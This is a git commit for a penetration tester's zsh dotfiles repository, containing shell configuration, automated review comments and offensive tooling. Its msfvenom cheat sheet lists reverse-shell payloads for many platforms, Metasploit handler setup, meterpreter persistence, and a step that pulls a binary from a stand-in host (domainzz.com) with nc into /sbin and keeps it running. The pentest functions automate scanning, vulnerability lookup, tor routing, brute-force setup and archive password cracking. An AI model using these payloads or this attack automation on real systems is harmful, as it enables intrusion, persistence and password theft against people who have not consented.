anti-chaos update, test version

master
user 2017-01-12 20:41:16 +01:00
parent 51629b5b0a
commit 0fd2b3df2f
20 changed files with 580 additions and 0 deletions

BIN
.README.md.un~ 100755


0
LICENSE 100644 → 100755

42
README.md 100644 → 100755

@ -1 +1,43 @@
Penetration Tester's Zsh - functions 4 fast pawn
Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
Installing after you have the dependencies: cp profile_files/.* -R ~/
Functions
=========
pawnpls - Automatically enumerate and start predefined attacks such as brute force.
Example for single target: autopawn n0nexi-stent.com
Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com"
everythingworksornot\? - check if everything works or not for this script
chk functions
=============
chkhttpz - HTTP response check
Example: chkhttpz itsec.lu 443
chkcrt - SSL certificate dump
Example: chkcrt gentoo.org 443
cracking functions
==================
johnzip - Crack zip files using john
Example: johnzip data.zip rockyou.txt
johnrar - Crack rar files using john
Example: johnrar data.rar rockyou.txt
help functions
==============
hlp - Get help of the hlp command
hlprnd - Get random strings (lengths: 8,16,32,64)

43
README.md~ 100755

@ -0,0 +1,43 @@
Penetration Tester's Zsh - functions 4 fast pawn
Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
Installing after you have the dependencies: cp profile_files/.* -R ~/
Functions
=========
pawnpls - Automatically enumerate and start predefined attacks such as brute force.
Example for single target: autopawn 127.0.0.1
Example for multiple targets: autopawn "127.0.0.1 127.0.0.2"
everythingworksornot\? - check if everything works or not for this script
chk functions
=============
chkhttpz - HTTP response check
Example: chkhttpz itsec.lu 443
chkcrt - SSL certificate dump
Example: chkcrt gentoo.org 443
cracking functions
==================
johnzip - Crack zip files using john
Example: johnzip data.zip rockyou.txt
johnrar - Crack rar files using john
Example: johnrar data.rar rockyou.txt
help functions
==============
hlp - Get help of the hlp command
hlprnd - Get random strings (lengths: 8,16,32,64)


@ -0,0 +1,6 @@
set linenumbers
set brackets ""')>]}"
set matchbrackets "(<[{)>]}"
set nohelp
set mouse
set smooth


@ -0,0 +1,126 @@
C0nn3ctz msfvenom payload backdoor veil
List payloads
msfvenom -l
# The script way to make life more simple
theip=0.0.0.0
theport=443
Binaries and libs
=================
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED
msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll
msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho
Web Payloads
============
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war
JavaScript
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le
Scripting Payloads
==================
Python
msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux
msfvenom -p cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows
Shellcode
=========
For all shellcode see msfvenom help-formats for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c
msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f <language>
Handler
=======
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD cmd/windows/powershell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler msfconsole -L -r
Persistence
===========
meterpreter > run persistence
UUID Payload
============
# Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat
# Setup msf listener
set payload linux/x86/meterpreter/reverse_tcp_uuid
set payloadUUIDName HAXHAXHAXHAX
set PayloadUUIDTracking true
run -j 
# Move to vict
cat hipchat.elf |ncat --ssl -lvp 53
nc --ssl domainzz.com 53 > /sbin/lister
chmod +x /sbin/lister
# crontab alternatively:
if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi


@ -0,0 +1,37 @@
C0nn3ctz sniffing wireshark network
IP address
ip.addr == 192.168.1.1
ip.src == 192.168.1.1
ip.dst == 192.168.1.1
Show only tcp port 110
tcp.port eq 110
Show only tcp and udp port 110
tcp.port eq 110 || udp.port eq 110
Follow TCP stream
tcp.stream eq 0
Show only TCP
tcp
Show only ARP
arp
Show only HTTP
http
Show only HTTP or ARP
http||arp
HTTP and ip.src
http&&ip.src==192.168.1.4
HTTP POST
http:.request.method == "POST"
etc
(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4)
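Review bot: The HTTP POST filter `http:.request.method == "POST"` has a stray colon after `http` and is not a valid Wireshark display filter; the field name is `http.request.method`, so the line should read `http.request.method == "POST"`. The last example, `(ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4)`, runs `)` straight into `and`; Wireshark appears to tolerate it, but a space before `and` keeps the example readable and consistent with the first clause.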


@ -0,0 +1,4 @@
syntax on
set nu
set backspace=indent,eol,start
set tabstop=4 shiftwidth=4 expandtab



@ -0,0 +1,10 @@
#!/usr/bin/python2.7
with open('2_ports_and_service_top1000_on_alive_hosts.out') as f:
curip=""
for curline in f:
if "Nmap scan report for " in curline:
curip=curline
curip=curip[21:]
if "open" in curline:
print curip.strip('\n') + " " + curline.strip('\n')
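Review bot: The input path is hard-coded to `2_ports_and_service_top1000_on_alive_hosts.out`, which ties this parser to the one caller in pentest_functions and makes it unusable on any other nmap output; read it from `sys.argv[1]` and keep that name as the default. `curip=curip[21:]` depends on the exact length of the `Nmap scan report for ` prefix and `"open" in curline` is a bare substring match, so a version string or hostname containing "open" would also be printed — hedged, since the rendered page has lost the indentation and the exact loop nesting is not visible. The shebang pins `python2.7` and the print statement is Python 2 only, while the caller invokes plain `python`; a one-line comment stating the intended interpreter would avoid a silent mismatch.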


@ -0,0 +1,2 @@
alias py='python'
alias pl='perl'


@ -0,0 +1,13 @@
bindkey "^K" kill-whole-line
bindkey "${terminfo[khome]}" beginning-of-line
bindkey "${terminfo[kend]}" end-of-line
bindkey "\e[3~" delete-char
bindkey -v
bindkey '^R' history-incremental-search-backward
bindkey '^T' history-incremental-search-backward
# Jumping with ctrl+arrows
bindkey "^[[1;5C" forward-word
bindkey "^[[1;5D" backward-word
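Review bot: `bindkey -v` sits after the first four bindings, so those (`^K`, home, end and delete) are applied to the keymap that was main at the time, presumably emacs, and are no longer in effect once `-v` makes viins the main keymap; move `bindkey -v` to the top of the file, or pass `-M viins` to every binding, so all of them land in the keymap the user actually gets. `^R` and `^T` are both bound to `history-incremental-search-backward`; if the second is meant to be the forward search it should read `bindkey '^T' history-incremental-search-forward`, otherwise it is a leftover that can be dropped.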


@ -0,0 +1,17 @@
autoload colors; colors
# The variables are wrapped in %{%}. This should be the case for every variable that does not contain space.
for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do
eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}'
eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}'
done
eval RESET='$reset_color'
export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK
export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE
export PR_BOLD_WHITE PR_BOLD_BLACK
# Clear LSCOLORS
unset LSCOLORS
export CLICOLOR=1
export LS_COLORS=exfxcxdxbxegedabagacad
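Review bot: `export LS_COLORS=exfxcxdxbxegedabagacad` puts a value in BSD `LSCOLORS` format (two letters per file type) into the GNU `LS_COLORS` variable, whose syntax is `key=value` pairs such as `di=34:ln=35`; on Debian/Kali, which the README names as the target, GNU ls will not understand it (it warns about an unparsable value and ignores it, as far as I can tell), and the preceding `unset LSCOLORS` removes the variable that value is actually meant for. Either keep `LSCOLORS` for BSD/macOS ls or derive `LS_COLORS` from `dircolors`; `CLICOLOR` is likewise honoured only by BSD ls. The export lists also skip `PR_MAGENTA`, `PR_CYAN` and their bold variants although the loop defines them, which is harmless but inconsistent.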


@ -0,0 +1,2 @@
autoload -U compinit && compinit
zmodload -i zsh/complist


@ -0,0 +1,22 @@
function extract {
echo Running extract on $1 ...
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar x $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*.xz) unxz $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
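Review bot: The file test `[ -f $1 ]` does not catch a missing argument: with `$1` empty zsh drops the unquoted expansion, `[ -f ]` is a one-argument test that is always true, and the call falls through to the `*)` arm reporting `'' cannot be extracted`. Check the argument explicitly, `[[ -n "$1" && -f "$1" ]] || { echo "usage: extract <archive>" >&2; return 1; }`, and return non-zero from the two error branches so callers can tell failure from success. The unquoted `$1` in every arm only works because zsh does not word-split or glob parameter expansions by default; quoting them as `"$1"` costs nothing and keeps the function correct if it is ever sourced by bash.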


@ -0,0 +1 @@
# Not saving history by default


@ -0,0 +1,200 @@
function everythingworksornot"?" {
echo "really?"
}
function ton {
. torsocks on
}
function tof {
. torsocks off
}
function chkhttpz {
echo "HTTP responses"
wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
echo "\nHTTPS responses"
wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/"
}
function chkcrt {
openssl s_client -showcerts -connect $1:$2
}
function hlp {
echo "You can get help from the following topics:"
for f in ~/.ptz/v3das/* ; do
echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
done
}
function hlprnd {
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-64};echo;
}
function johnzip {
if [ $# -ne 2 ]
then
echo "Usage $0 <zipfile> <wordlist>"
return
fi
echo "Unzip test..."
unzip -l $1
echo "Cracking...."
for i in $(john --wordlist=$2 --rules --stdout)
do
echo -ne "\rtrying \"$i\" "
unzip -o -P $i $1 >/dev/null 2>&1
STATUS=$?
if [ $STATUS -eq 0 ]; then
echo -e "\nArchive password is: \"$i\""
return
fi
done
}
function johnrar {
if [ $# -ne 2 ]
then
echo "Usage $0 <rarfile> <wordlist>"
else
rar l $1
echo "Cracking...."
john --wordlist=$2 --rules --stdout | while read i
do
echo -ne "\rtrying \"$i\" "
rar e -o+ -inul -p$i $1 >/dev/null
STATUS=$?
if [ $STATUS -eq "0" ]; then
echo -e "\nArchive password is: \"$i\""
return
fi
done
fi
}
function pawnpls {
amir00t=$(whoami)
if [ "$amir00t" != "root" ]
then
echo "pawnpls needs root in order to be effective (eg. for nmap -sS scans)."
return
fi
if [ $# -ne 1 ]
then
echo "Are you sure? You need to specify a target. Be careful. This runs out of tor also, even if you have torsocks ;)"
return
fi
# Pass to the scan function, no active attacks, just scanning
pawnpls_tof_target=$1
dns_enum_tof
scan_enum_tof
active_attack_tof
}
function dns_enum_tof {
. torsocks off
dnstarg=($pawnpls_tof_target)
cdate=$(date +"%Y-%m-%d-%H%M")
dettmpfold="~/.ptz/result-scan-$cdate"
mkdir -p $sctmpfold
cd $sctmpfold
theharvester -d $pawnpls_tof_target -b all -v > 1_harvester_$pawnpls_tof_target.txt
}
function scan_enum_tof {
. torsocks off
# Variables
targetx=($pawnpls_tof_target) # Space delimited!
ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211)
# Initialize directory and naming structure
cdate=$(date +"%Y-%m-%d-%H%M")
sctmpfold="~/.ptz/result-scan-$cdate"
mkdir -p $sctmpfold
cd $sctmpfold
touch scan_history.txt
echo "---- Starting AgroScanner ----" >> scan_history.txt
# Start with standard alive scan and check ports on alive hosts
# Get alive hosts
echo "Starting alive host enumeration..."
echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt
nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out
alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ')
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt
echo "Starting port scans on alive hosts..."
# Port scanning on alive hosts and version detection
echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt
nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out
python ~/.zsh/agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out
number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this.
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt
# Run UDP scan on most common ports
echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt
nmap -sU --top-ports 50 $targetx > 4_udpscan.out
number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l)
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt
echo "Starting nmap nse vulnerability scanning..."
# Vulnerability scanning
echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt
nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt
nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something
nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt
echo $(date +"%Y-%m-%d-%H-%M-%S") " Started scan for automatic searchsploit." >> scan_history.txt
# for searchsploit, but nmap should be configured to scan with xml, default is top 1000
nmap -sS -sV -sC -O --host-timeout=5m --max-hostgroup=1 -Pn $targetx -oA 8_nmap_for_searchsploit
searchsploit -v --nmap 8_nmap_for_searchsploit.xml > 9_searchslpoit_results.txt
echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished the searchsploit queries. Outputs are in the relevant files." >> scan_history.txt
}
function active_attack_tof {
. torsocks off
cdate=$(date +"%Y-%m-%d-%H%M")
aatmpfold="~/.ptz/result-attack-$cdate"
mkdir -p $aatmpfold
cd $aatmpfold
# Preconfs
hydrabruteprotocol=(cvs firebird icq irc ldap nntp oracle-listener oracle-sid pcanywhere pcnfs postgres rdp redis rtsp ssh sip teamspeak vmauthd)
usernames="/usr/share/nmap/nselib/data/usernames.lst"
passwords="/usr/share/nmap/nselib/data/passwords.lst"
}
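Review bot: The result directories are never created where intended: `sctmpfold="~/.ptz/result-scan-$cdate"` in scan_enum_tof, and the same pattern in dns_enum_tof and active_attack_tof, keeps the tilde inside double quotes where neither zsh nor bash expands it, so `mkdir -p` creates a literal directory named `~` under the current working directory and all output lands there; write `"$HOME/.ptz/result-scan-$cdate"`. dns_enum_tof additionally assigns `dettmpfold` but then runs `mkdir -p $sctmpfold` and `cd $sctmpfold`; with that variable empty mkdir fails and `cd` with no operand goes to the home directory, leaving the theharvester output in $HOME. Because these functions are sourced into the interactive shell, each `cd` also moves the user's shell, so `mkdir -p "$dir" && cd "$dir" || return 1` is the minimum, and running the scan body in a subshell would avoid the side effect entirely. The `--script smb-enum-*` argument is an unquoted glob that zsh refuses to run when nothing in the cwd matches, which the inline comment already suspects; quoting it as `--script 'smb-enum-*'` fixes that.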


@ -0,0 +1,37 @@
function git_prompt_info {
local ref=$(=git symbolic-ref HEAD 2> /dev/null)
local gitst="$(=git status 2> /dev/null)"
if [[ -f .git/MERGE_HEAD ]]; then
if [[ ${gitst} =~ "unmerged" ]]; then
gitstatus=" %{$fg[red]%}unmerged%{$reset_color%}"
else
gitstatus=" %{$fg[green]%}merged%{$reset_color%}"
fi
elif [[ ${gitst} =~ "Changes to be committed" ]]; then
gitstatus=" %{$fg[blue]%}!%{$reset_color%}"
elif [[ ${gitst} =~ "use \"git add" ]]; then
gitstatus=" %{$fg[red]%}!%{$reset_color%}"
elif [[ -n `git checkout HEAD 2> /dev/null | grep ahead` ]]; then
gitstatus=" %{$fg[yellow]%}*%{$reset_color%}"
else
gitstatus=''
fi
if [[ -n $ref ]]; then
echo "%{$fg_bold[green]%}/${ref#refs/heads/}%{$reset_color%}$gitstatus"
fi
}
function trso {
trsochk=$(/usr/bin/torsocks show|grep libtorsocks.so)
if [[ -z $(/usr/bin/torsocks show|grep libtorsocks.so) ]]
then
trchkres="%{$fg[yellow]%}tof"
else
trchkres="%{$fg[red]%}ton"
fi
echo $trchkres
}
PROMPT='%{$fg[red]%}$(whoami)%{$reset_color%}.ptz $(trso)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} '
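Review bot: git_prompt_info runs `git checkout HEAD` on every prompt draw, in the `elif` branch that greps its output for "ahead"; checkout is a write-capable command and the wrong tool for a read-only status query, and the same text is already in `gitst`, captured from `git status` at the top of the function. Replace that branch with `elif [[ ${gitst} =~ "ahead" ]]; then`. In trso, `trsochk` is computed and then the identical `torsocks show | grep` pipeline is re-run inside the condition; use `if [[ -z $trsochk ]]`. `gitstatus` is assigned without `local` and so leaks into the interactive shell each time the prompt is rendered.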


@ -0,0 +1,4 @@
setopt AUTO_CD
setopt COMPLETE_IN_WORD
setopt ALWAYS_TO_END
setopt PROMPT_SUBST


@ -0,0 +1,14 @@
source ~/.zsh/colors.zsh
source ~/.zsh/setopt.zsh
source ~/.zsh/prompt.zsh
source ~/.zsh/completion.zsh
source ~/.zsh/aliases.zsh
source ~/.zsh/bindkeys.zsh
source ~/.zsh/functions.zsh
source ~/.zsh/general_functions.zsh
source ~/.zsh/pentest_functions.zsh
source ~/.zsh/history.zsh
zstyle ':completion:*' menu select
. torsocks on
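Review bot: `. torsocks on` on the last line runs unconditionally for every interactive shell and, because `.` resolves a slash-less name through $path, on a machine without torsocks zsh prints an error at every startup; the prompt helper in prompt.zsh hard-codes `/usr/bin/torsocks`, so the two may not even refer to the same binary. Guard it with `command -v torsocks >/dev/null && . torsocks on` and use the same lookup in both places. A one-line comment above the `source` list saying that the functions files assume colors.zsh and setopt.zsh have already been loaded would help anyone reordering these lines.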